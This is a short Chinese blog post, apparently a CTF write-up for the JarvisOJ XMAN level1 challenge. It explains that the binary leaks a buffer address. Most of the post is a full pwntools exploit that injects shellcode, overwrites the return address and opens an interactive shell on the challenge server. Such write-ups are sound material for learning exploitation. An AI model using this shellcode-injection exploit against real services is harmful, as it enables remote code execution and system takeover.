[JarvisOj][XMAN]level1

都没开。。。

ida分析 发现返回了buf的地址

并没有自带system 或者/bin/sh

所以估计是自己写shellcode

偷个图。。。

复制代码
#!/usr/bin/env python

# -*- coding: utf-8 -*-



from pwn import *



shellcode = asm(shellcraft.sh())

io = remote('pwn2.jarvisoj.com', 9877)

text = io.recvline()[14: -2]

print text[14:-2]

buf_addr = int(text, 16)



payload = shellcode + '\x90' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)

io.send(payload)

io.interactive()

io.close()
复制代码

 

posted @   轩x  阅读(544)  评论(0编辑  收藏  举报
编辑推荐:
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
点击右上角即可分享
微信分享提示